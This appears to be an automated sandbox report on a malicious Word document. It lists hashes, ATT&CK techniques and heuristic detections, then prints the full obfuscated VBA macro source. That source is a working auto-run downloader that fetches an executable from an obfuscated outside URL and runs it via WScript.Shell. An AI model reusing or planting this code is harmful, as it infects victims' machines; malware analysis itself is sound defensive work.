Office (OLE) malware analysis — malicious · 4d75f6697e1f9b21

MALICIOUS

Office (OLE)

71.0 KB Created: 2016-05-09 21:51:00 Authoring application: Microsoft Office Word First seen: 2019-12-09

MD5: 1c541c7c8693d669459d2c212471b980 SHA-1: 3c476fe81c57b7441e1d146167bd1f0a1670280f SHA-256: 4d75f6697e1f9b21ca43eb4af269868fd8e8ce74591bfd5c0ae84aea04c305a0

330 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is present and utilizes 'Shell()' and 'CreateObject()' calls, indicating an attempt to execute arbitrary code. This is consistent with a dropper or downloader malware.

Heuristics 10

ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

Dim HYZoDRudI As Integer
Set XETrTRXL = CreateObject("WScript.Shell")
End Function

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Dim sXMzCyPBRE As Boolean
Set bZiQEUoAX = CreateObject("ADODB.Stream")
End Function

CallByName call high OLE_VBA_CALLBYNAME

CallByName call

Matched line in script

Dim pdxxPHSfW As Integer, kTRGfWEy As Integer
uvdSnC = CallByName(mdSgn, WTYaj, 2)
End Function

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Document_Open()
Dim sWZeXmspMZ As Boolean

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7477 bytes
SHA-256: `da40084128e34dee80523ab81011de09ee853921503c4e2f1ba8e49a338a1c4f`
Detection ClamAV: No threats found Obfuscation or payload: likely 123 of 194 identifiers look randomly generated (e.g. 'RxKeNsKpNonKsCeCBKoNxdKy') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim sWZeXmspMZ As Boolean pNgavmiEKJ.gFfmUVs End Sub Private Sub fiajFHZsQ() RdzCgNLfo "HktK", "y9xGo", False cdVmY 1519, False, True End Sub Attribute VB_Name = "TtcIaXa" Private Sub jESbkyhpJ(ByVal xSOLF As String) cUAGYTZsVc 1225, 2737, "Ns0Rg" eeccmroa 8244 sIezp qjETUiCBEo 1195, "ivN1", "y8J" End Sub Public Function XHESS(ByVal GGqKPKJrex As Integer, ByVal fmCfWeSIcR As String) As String Dim KcvPasUi As Boolean XHESS = Mid(fmCfWeSIcR, GGqKPKJrex, 1) End Function Private Sub NKHVta(ByVal MCXmSWbhc As String) yqdpRWtCu End Sub Public Function NcgIWIQvgK(ByVal gHcvgocwY As String, ByVal NzkNKHftg As String, ByVal yOOFbERKq As String) As Boolean Dim VnIBA As String Dim PBvML As String NcgIWIQvgK = InStr(1, yOOFbERKq, gHcvgocwY) End Function Attribute VB_Name = "qlpiGK" Public Function RiYKggL(ByVal gcFsEfv As String, ByVal cEfbjz As String) As String Dim OtAqQxMv As Boolean Dim SdPdCiw As String, IBGFmd As String For pvWGCLgX = 1 To Len(gcFsEfv) OtAqQxMv = TtcIaXa.NcgIWIQvgK(TtcIaXa.XHESS(pvWGCLgX, gcFsEfv), uJCPXVWw, cEfbjz) If Not OtAqQxMv Then XQUKUIlGS = 9746 RiYKggL = RiYKggL & TtcIaXa.XHESS(pvWGCLgX, gcFsEfv) End If Next End Function Private Function uJCPXVWw() As String IkmTucyV = "" uJCPXVWw = "2WJnP" End Function Attribute VB_Name = "tIvJlZJvF" Public Function uvdSnC(ByVal mdSgn As Object, ByVal CfOzRoZGun As String, ByVal WTYaj As String, ByVal VgCqVQCru As Integer) As Variant Dim pdxxPHSfW As Integer, kTRGfWEy As Integer uvdSnC = CallByName(mdSgn, WTYaj, 2) End Function Public Sub aeAafPvM(ByVal PvlzazUfA As String, ByVal tpyGbdoEQj As Variant, ByVal HaGNDmv As Variant, ByVal GBtVkMkQ As Object) Dim lHmBuq As String CallByName GBtVkMkQ, PvlzazUfA, 1, HaGNDmv, tpyGbdoEQj End Sub Private Function rtWcGCOGDg() As Boolean HTXti "tgYI" rtWcGCOGDg = False End Function Public Function MFFQv(ByVal BeAJg As String, ByVal QSCuS As String, ByVal cvgpWXl As Object) As Variant Dim JBfjk As Boolean Dim AzQjSLoU As Boolean Set MFFQv = CallByName(cvgpWXl, QSCuS, 2, BeAJg) End Function Public Sub ofQEagNCR(ByVal zYwmBjKdA As Boolean, ByVal BcimJzTXxI As String, ByVal zZDIBErBe As Object, ByVal ZpLhgd As Variant) Dim sbMoAZE As Integer Dim LOkAk As Integer CallByName zZDIBErBe, BcimJzTXxI, 1, ZpLhgd End Sub Private Sub huWOw(ByVal XshmLCte As Boolean) NvOKlpusE aVtapbVnl "", 1093, 9096 End Sub Private Function QqZeLOBHL() As Integer nCnktKv False hCCQENhD 3748, 2598, "BWQ" CGgZkEaFBc QqZeLOBHL = 1258 End Function Public Sub ETZlueM(ByVal ffzrOMlAl As Integer, ByVal oegby As String, ByVal dngYyt As Variant, ByVal yYMpHBuEO As String, ByVal WVZkUPnPQy As Object) CallByName WVZkUPnPQy, oegby, 4, dngYyt End Sub Private Function BDIyEQNA(ByVal pVGKTKG As String) As Boolean gOZso 1884 BDIyEQNA = True End Function Public Sub nDXWgVaB(ByVal jFLQYI As Object, ByVal aPcNqh As String) Dim HJKDWFSbK As Integer Dim qkZxzUw As Integer kayWGvM = "" CallByName jFLQYI, aPcNqh, 1 End Sub Attribute VB_Name = "yxAzCBpe" Public Function bZiQEUoAX() As Object Dim sXMzCyPBRE As Boolean Set bZiQEUoAX = CreateObject("ADODB.Stream") End Function Public Function XETrTRXL() As Object Dim HYZoDRudI As Integer Set XETrTRXL = CreateObject("WScript.Shell") End Function Public Function aJIfxJZodD() As Object Dim AiSqstM As String Set aJIfxJZodD = CreateObject("MSXML2.ServerXMLHTTP.6.0") End Function Private Function QufpcZdA() As Integer YRcIVIcog zzTmoaeZe False, "" ngYFxDZeTQ False, 7239, "" QufpcZdA = 7668 End Function Attribute VB_Name = "pNgavmiEKJ" Private Function EomLao() As String qAgGuRAod = 7052 EomLao = qlpiGK.RiYKggL("hE1t1tSp:S/E/EsS1a1scEuEaS.1ScEoEmS/sEySsEEteSmS1/cSSa1cEhe1S/31E2fSE32ESg.E1exE1e", "ES1") End Function Private Sub ppkHpIx(ByVal YnuZrPfbaC As String) Dim Pyqsuj As Integer MDpGo = "kBmv" tIvJlZJvF.ofQEagNCR True, PGEJFjiOIP, yxAzCBpe.XETrTRXL, YnuZrPfbaC End Sub Public Sub gFfmUVs() cKAIKaerq = "" YUSZTLp End Sub Private Function cQrOaLqaF() As String cQrOaLqaF = "pyHY" End Function Private Function rPeqnQcyK() As String Dim eEhHa As Integer rPeqnQcyK = JzEfZof(qlpiGK.RiYKggL("eTJEoMPe", "eJo")) & zVFSzCf End Function Private Function WNqBeL() As String WNqBeL = qlpiGK.RiYKggL("RxKeNsKpNonKsCeCBKoNxdKy", "NKCx") End Function Private Function NhnSmVlON() As String NhnSmVlON = "Vb0T7" End Function Private Sub aJBkAaphH(ByVal sIPyuadE As Integer, ByVal GBZskde As String, ByVal lxYJsBCX As String, ByVal gUaDB As String) Dim TaULKEoJ As String, ZyPTWCYq As Integer Set oxUnFM = yxAzCBpe.aJIfxJZodD oxUnFM.Open DhDnlIsSB, lxYJsBCX, False tIvJlZJvF.nDXWgVaB oxUnFM, qlpiGK.RiYKggL("PSeYbndb", "bPY") rrQumoYv False, GBZskde, "yR0", tIvJlZJvF.uvdSnC(oxUnFM, "KP", WNqBeL, 1945) End Sub Private Function hHCstF() As String hHCstF = qlpiGK.RiYKggL("CRlAoRsAAe", "ERNA") End Function Private Function cKNQjiDW() As String Dim pOrRFib As Integer cKNQjiDW = EomLao End Function Private Sub CEGmN() JPvLzyRGsx 7449 NURQhgJR bFqvCc False, True, 9563 qjMaTOIxQi End Sub Private Function zVFSzCf() As String Dim jbmFfpJi As String Dim YdVNBik As Integer zVFSzCf = YTtJZVQK End Function Private Sub YUSZTLp() On Error GoTo lesJtbZS aJBkAaphH 5708, rPeqnQcyK, cKNQjiDW, NhnSmVlON ieHcrIl = "BsVc4" ppkHpIx rPeqnQcyK Exit Sub QIGVmfY = "4u" lesJtbZS: End Sub Private Function YTtJZVQK() As String IFLCzb = True YTtJZVQK = qlpiGK.RiYKggL("j/dgj02kj1g1S66Sjbagrf.Sjexkje", "Sjgkr") End Function Private Function LtgcPJUr(ByVal TZigq As Integer, ByVal BkXNoxybM As Boolean) As String ICxOAIJEjl JDQNlwwUu ubsRjN True LtgcPJUr = "" End Function Private Function fgsPwk(ByVal quCugkfEx As Boolean) As Boolean If NACpLN("SzbAB", "hv") Then GbhxArF Halxgk End If nDkOinXoNp SclaOvXM 3912, False, "zW3X" SFyHb fgsPwk = False End Function Private Sub xqHViadvzm() aBDhFcyR "", "FFpd" End Sub Private Function DhDnlIsSB() As String bwVhN = 9168 DhDnlIsSB = qlpiGK.RiYKggL("GHZEjT", "4jZc0H") End Function Private Function rdpYgruZts() As String rdpYgruZts = qlpiGK.RiYKggL("wOpWeinw", "wiW") End Function Private Function PGEJFjiOIP() As String mVMPpQPeMQ = 3401 PGEJFjiOIP = qlpiGK.RiYKggL("jE0xe0jc", "jWh60f") End Function Private Sub rrQumoYv(ByVal cNMdym As Boolean, ByVal PsZYlZhJp As String, ByVal XBbWWJWuh As String, ByVal Cdyuk As Variant) Dim RztyfS As String Set jFBKbfZja = yxAzCBpe.bZiQEUoAX bZfJcN = 978 tIvJlZJvF.ETZlueM 654, WCCYnnYfik, 1, cQrOaLqaF, jFBKbfZja tIvJlZJvF.nDXWgVaB jFBKbfZja, rdpYgruZts tIvJlZJvF.ofQEagNCR True, qlpiGK.RiYKggL("Wbr3i0OtOe", "b3O0"), jFBKbfZja, Cdyuk tIvJlZJvF.aeAafPvM qlpiGK.RiYKggL("hSaGhverTGhoFGrilGeG", "rhG"), 2, PsZYlZhJp, jFBKbfZja tIvJlZJvF.nDXWgVaB jFBKbfZja, hHCstF End Sub Private Function JzEfZof(ByVal EjQEYb As String) As String Set ikHNExdC = tIvJlZJvF.MFFQv(qlpiGK.RiYKggL("rPrROFCr0ErSFS", "r0F"), qlpiGK.RiYKggL("EWwn vi ro00n0mwenWtw", "Ww0 "), yxAzCBpe.XETrTRXL) ZcTzOUAO = False JzEfZof = ikHNExdC(EjQEYb) End Function Private Function WCCYnnYfik() As String WCCYnnYfik = qlpiGK.RiYKggL("TPyPlpe1", "1lmPs") End Function

Open this report in the interactive analyzer, or submit your own file for analysis.